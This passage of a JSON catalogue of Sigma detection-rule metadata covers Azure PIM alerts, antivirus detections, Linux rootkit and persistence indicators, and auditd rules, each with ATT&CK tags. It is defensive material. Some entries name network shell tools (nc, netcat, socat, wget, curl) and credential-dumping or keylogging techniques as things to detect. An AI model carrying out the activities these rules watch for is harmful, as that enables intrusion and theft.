"https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_frequent_activation.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "645fd80d-6c07-435b-9e06-7bc1b5656cba", "value": "Roles Activated Too Frequently" }, { "description": "Identifies when a privilege role assignment has taken place outside of PIM and may indicate an attack.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-14", "falsepositive": [ "Investigate where users are being assigned privileged roles outside of Privileged Identity Management and prohibit future assignments from there." ], "filename": "azure_pim_role_assigned_outside_of_pim.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-assigned-outside-of-privileged-identity-management", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_assigned_outside_of_pim.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1bc08d1-8224-4758-a0e6-fbcfc98c73bb", "value": "Roles Assigned Outside PIM" }, { "description": "Host Without Firewall. Alert means not complied. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.", "meta": { "author": "Alexandr Yampolskyi, SOC Prime", "creation_date": "2019-03-19", "falsepositive": "No established falsepositives", "filename": "host_without_firewall.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "qualys", "refs": [ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml" ], "tags": "No established tags" }, "uuid": "6b2066c8-3dc7-4db7-9db0-6cc1d7b0dde9", "value": "Host Without Firewall" }, { "description": "Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts.\nSigma detects default credentials usage. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.\n", "meta": { "author": "Alexandr Yampolskyi, SOC Prime", "creation_date": "2019-03-26", "falsepositive": [ "Unknown" ], "filename": "default_credentials_usage.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "qualys", "refs": [ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists", "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml" ], "tags": [ "attack.initial-access" ] }, "uuid": "1a395cbc-a84a-463a-9086-ed8a70e573c7", "value": "Default Credentials Usage" }, { "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels\nEnsure that an encryption is used for all sensitive information in transit.\nEnsure that an encrypted channels is used for all administrative account access.\n", "meta": { "author": "Alexandr Yampolskyi, SOC Prime", "creation_date": "2019-03-26", "falsepositive": [ "Unknown" ], "filename": "netflow_cleartext_protocols.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "No established product", "refs": [ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "7e4bfe58-4a47-4709-828d-d86c78b7cc1f", "value": "Cleartext Protocol Usage Via Netflow" }, { "description": "Detects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields", "meta": { "author": "@juju4", "creation_date": "2022-12-27", "falsepositive": [ "Inventory and monitoring activity", "Vulnerability scanners", "Legitimate applications" ], "filename": "db_anomalous_query.yml", "level": "medium", "logsource.category": "database", "logsource.product": "No established product", "refs": [ "https://github.com/sqlmapproject/sqlmap", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/database/db_anomalous_query.yml" ], "tags": [ "attack.exfiltration", "attack.initial-access", "attack.privilege-escalation", "attack.t1190", "attack.t1505.001" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d84c0ded-edd7-4123-80ed-348bb3ccc4d5", "value": "Suspicious SQL Query" }, { "description": "Detects a highly relevant Antivirus alert that reports a password dumper.\nThis event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.\n", "meta": { "author": "Florian Roth (Nextron Systems), Arnim Rupp", "creation_date": "2018-09-09", "falsepositive": [ "Unlikely" ], "filename": "av_password_dumper.yml", "level": "critical", "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619", "https://www.nextron-systems.com/?s=antivirus", "https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_password_dumper.yml" ], "tags": [ "attack.credential-access", "attack.t1003", "attack.t1558", "attack.t1003.001", "attack.t1003.002" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3fc01293-ef5e-41c6-86ce-61f10706b64a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "78cc2dd2-7d20-4d32-93ff-057084c38b93", "value": "Antivirus Password Dumper Detection" }, { "description": "Detects an Antivirus alert in a highly relevant file path or with a relevant file name.\nThis event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.\n", "meta": { "author": "Florian Roth (Nextron Systems), Arnim Rupp", "creation_date": "2018-09-09", "falsepositive": [ "Unlikely" ], "filename": "av_relevant_files.yml", "level": "high", "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ "https://www.nextron-systems.com/?s=antivirus", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_relevant_files.yml" ], "tags": [ "attack.resource-development", "attack.t1588" ] }, "related": [ { "dest-uuid": "ce0687a0-e692-4b77-964a-0784a8e54ff1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c9a88268-0047-4824-ba6e-4d81ce0b907c", "value": "Antivirus Relevant File Paths Alerts" }, { "description": "Detects a highly relevant Antivirus alert that reports ransomware.\nThis event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.\n", "meta": { "author": "Florian Roth (Nextron Systems), Arnim Rupp", "creation_date": "2022-05-12", "falsepositive": [ "Unlikely" ], "filename": "av_ransomware.yml", "level": "critical", "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ "https://www.nextron-systems.com/?s=antivirus", "https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7", "https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916", "https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d", "https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c", "https://www.virustotal.com/gui/file/6f0f20da34396166df352bf301b3c59ef42b0bc67f52af3d541b0161c47ede05", "https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_ransomware.yml" ], "tags": [ "attack.t1486" ] }, "related": [ { "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4c6ca276-d4d0-4a8c-9e4c-d69832f8671f", "value": "Antivirus Ransomware Detection" }, { "description": "Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool.\nThis event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.\n", "meta": { "author": "Florian Roth (Nextron Systems), Arnim Rupp", "creation_date": "2021-08-16", "falsepositive": [ "Unlikely" ], "filename": "av_hacktool.yml", "level": "high", "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ "https://www.nextron-systems.com/?s=antivirus", "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_hacktool.yml" ], "tags": [ "attack.execution", "attack.t1204" ] }, "related": [ { "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fa0c05b6-8ad3-468d-8231-c1cbccb64fba", "value": "Antivirus Hacktool Detection" }, { "description": "Detects a highly relevant Antivirus alert that reports a web shell.\nIt's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big WebShell repository from e.g. github and checking the matches.\nThis event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.\n", "meta": { "author": "Florian Roth (Nextron Systems), Arnim Rupp", "creation_date": "2018-09-09", "falsepositive": [ "Unlikely" ], "filename": "av_webshell.yml", "level": "high", "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ "https://www.nextron-systems.com/?s=antivirus", "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection", "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", "https://github.com/tennc/webshell", "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", "https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_webshell.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fdf135a2-9241-4f96-a114-bb404948f736", "value": "Antivirus Web Shell Detection" }, { "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework.\nThis event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.\n", "meta": { "author": "Florian Roth (Nextron Systems), Arnim Rupp", "creation_date": "2018-09-09", "falsepositive": [ "Unlikely" ], "filename": "av_exploiting.yml", "level": "critical", "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ "https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797", "https://www.nextron-systems.com/?s=antivirus", "https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466", "https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_exploiting.yml" ], "tags": [ "attack.execution", "attack.t1203", "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "238527ad-3c2c-4e4f-a1f6-92fd63adb864", "value": "Antivirus Exploitation Framework Detection" }, { "description": "Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-05", "falsepositive": [ "Unlikely" ], "filename": "file_event_lnx_triple_cross_rootkit_lock_file.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "linux", "refs": [ "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "c0239255-822c-4630-b7f1-35362bcb8f44", "value": "Triple Cross eBPF Rootkit Default LockFile" }, { "description": "Detects creation of cron file or files in Cron directories which could indicates potential persistence.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "creation_date": "2021-10-15", "falsepositive": [ "Any legitimate cron file." ], "filename": "file_event_lnx_persistence_cron_files.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "linux", "refs": [ "https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_persistence_cron_files.yml" ], "tags": [ "attack.persistence", "attack.t1053.003" ] }, "related": [ { "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", "value": "Persistence Via Cron Files" }, { "description": "Detects the creation of doas.conf file in linux host platform.", "meta": { "author": "Sittikorn S, Teoderick Contreras", "creation_date": "2022-01-20", "falsepositive": [ "Unlikely" ], "filename": "file_event_lnx_doas_conf_creation.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "linux", "refs": [ "https://www.makeuseof.com/how-to-install-and-use-doas/", "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "00eee2a5-fdb0-4746-a21d-e43fbdea5681", "value": "Linux Doas Conf File Creation" }, { "description": "Detects the creation of shell scripts under the \"profile.d\" path.", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-06-02", "falsepositive": [ "Legitimate shell scripts in the \"profile.d\" directory could be common in your environment. Apply additional filter accordingly via \"image\", by adding specific filenames you \"trust\" or by correlating it with other events.", "Regular file creation during system update or software installation by the package manager" ], "filename": "file_event_lnx_susp_shell_script_under_profile_directory.yml", "level": "low", "logsource.category": "file_event", "logsource.product": "linux", "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "13f08f54-e705-4498-91fd-cce9d9cee9f1", "value": "Potentially Suspicious Shell Script Creation in Profile Folder" }, { "description": "Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. Which both are related to the TripleCross persistence method", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-05", "falsepositive": [ "Unlikely" ], "filename": "file_event_lnx_triple_cross_rootkit_persistence.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "linux", "refs": [ "https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.t1053.003" ] }, "related": [ { "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a2ea919-d11d-4d1e-8535-06cda13be20f", "value": "Triple Cross eBPF Rootkit Default Persistence" }, { "description": "Detects the use of wget to download content in a temporary directory such as \"/tmp\" or \"/var/tmp\"", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-06-02", "falsepositive": [ "Legitimate downloads of files in the tmp folder." ], "filename": "file_event_lnx_wget_download_file_in_tmp_dir.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "linux", "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "35a05c60-9012-49b6-a11f-6bab741c9f74", "value": "Wget Creating Files in Tmp Directory" }, { "description": "Detects creation of sudoers file or files in \"sudoers.d\" directory which can be used a potential method to persiste privileges for a specific user.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-05", "falsepositive": [ "Creation of legitimate files in sudoers.d folder part of administrator work" ], "filename": "file_event_lnx_persistence_sudoers_files.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "linux", "refs": [ "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml" ], "tags": [ "attack.persistence", "attack.t1053.003" ] }, "related": [ { "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ddb26b76-4447-4807-871f-1b035b2bfa5d", "value": "Persistence Via Sudoers Files" }, { "description": "Detects possible command execution by web application/web shell", "meta": { "author": "Ilyas Ochkov, Beyu Denis, oscd.community", "creation_date": "2019-10-12", "falsepositive": [ "Admin activity", "Crazy web applications" ], "filename": "lnx_auditd_web_rce.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "Personal Experience of the Author", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_web_rce.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c0d3734d-330f-4a03-aae2-65dacc6a8222", "value": "Webshell Remote Command Execution" }, { "description": "Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.\nThis includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\nThese commands match a few techniques from the tactics \"Command and Control\", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)\n", "meta": { "author": "Marie Euler", "creation_date": "2020-05-18", "falsepositive": [ "Admin or User activity" ], "filename": "lnx_auditd_susp_c2_commands.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/Neo23x0/auditd", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml" ], "tags": [ "attack.command-and-control" ] }, "uuid": "f7158a64-6204-4d6d-868a-6e6378b467e0", "value": "Suspicious C2 Activities" }, { "description": "Detect changes in auditd configuration files", "meta": { "author": "Mikhail Larin, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate administrative activity" ], "filename": "lnx_auditd_auditing_config_change.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/Neo23x0/auditd/blob/master/audit.rules", "Self Experience", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_auditing_config_change.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.006" ] }, "related": [ { "dest-uuid": "74d2a63f-3c7b-4852-92da-02d8fbab16da", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "977ef627-4539-4875-adf4-ed8f780c4922", "value": "Auditing Configuration Changes on Linux Host" }, { "description": "Detects program executions in suspicious non-program folders related to malware or hacking activity", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-01-23", "falsepositive": [ "Admin activity (especially in /tmp folders)", "Crazy web applications" ], "filename": "lnx_auditd_susp_exe_folders.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml" ], "tags": [ "attack.t1587", "attack.t1584", "attack.resource-development" ] }, "related": [ { "dest-uuid": "edadea33-549c-4ed1-9783-8f5a5853cbdf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", "value": "Program Executions in Suspicious Folders" }, { "description": "Detect attempt to enable auditing of TTY input", "meta": { "author": "Pawel Mazur", "creation_date": "2021-05-24", "falsepositive": [ "Administrative work" ], "filename": "lnx_auditd_keylogging_with_pam_d.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md", "https://access.redhat.com/articles/4409591#audit-record-types-2", "https://linux.die.net/man/8/pam_tty_audit", "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml" ], "tags": [ "attack.credential-access", "attack.t1003", "attack.t1056.001" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "09a60ea3-a8d1-4ae5-976e-5783248b72a4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "49aae26c-450e-448b-911d-b3c13d178dfc", "value": "Linux Keylogging with Pam.d" }, { "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2019-10-21", "falsepositive": [ "Legitimate administrator or user uses network sniffing tool for legitimate reasons." ], "filename": "lnx_auditd_network_sniffing.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_sniffing.yml" ], "tags": [ "attack.credential-access", "attack.discovery", "attack.t1040" ] }, "related": [ { "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f4d3748a-65d1-4806-bd23-e25728081d01", "value": "Network Sniffing - Linux" }, { "description": "Detect file time attribute change to hide new or changes to existing files.", "meta": { "author": "Igor Fits, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_change_file_time_attr.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.006" ] }, "related": [ { "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b", "value": "File Time Attribute Change - Linux" }, { "description": "Detects overwriting (effectively wiping/deleting) of a file.", "meta": { "author": "Jakob Weinzettl, oscd.community", "creation_date": "2019-10-23", "falsepositive": [ "Appending null bytes to files.", "Legitimate overwrite of files." ], "filename": "lnx_auditd_dd_delete_file.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_dd_delete_file.yml" ], "tags": [ "attack.impact", "attack.t1485" ] }, "related": [ { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "37222991-11e9-4b6d-8bdf-60fbe48f753e", "value": "Overwriting the File with Dev Zero or Null" }, { "description": "Detects system information discovery commands", "meta": { "author": "Ömer Günal, oscd.community", "creation_date": "2020-10-08", "falsepositive": [ "Legitimate administration activities" ], "filename": "lnx_auditd_system_info_discovery2.yml", "level": "informational", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1f358e2e-cb63-43c3-b575-dfb072a6814f", "value": "System and Hardware Information Discovery" }, { "description": "Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.", "meta": { "author": "Pawel Mazur", "creation_date": "2021-11-28", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_capabilities_discovery.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://mn3m.info/posts/suid-vs-capabilities/", "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/", "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099", "https://man7.org/linux/man-pages/man8/getcap.8.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml" ], "tags": [ "attack.collection", "attack.privilege-escalation", "attack.t1123", "attack.t1548" ] }, "related": [ { "dest-uuid": 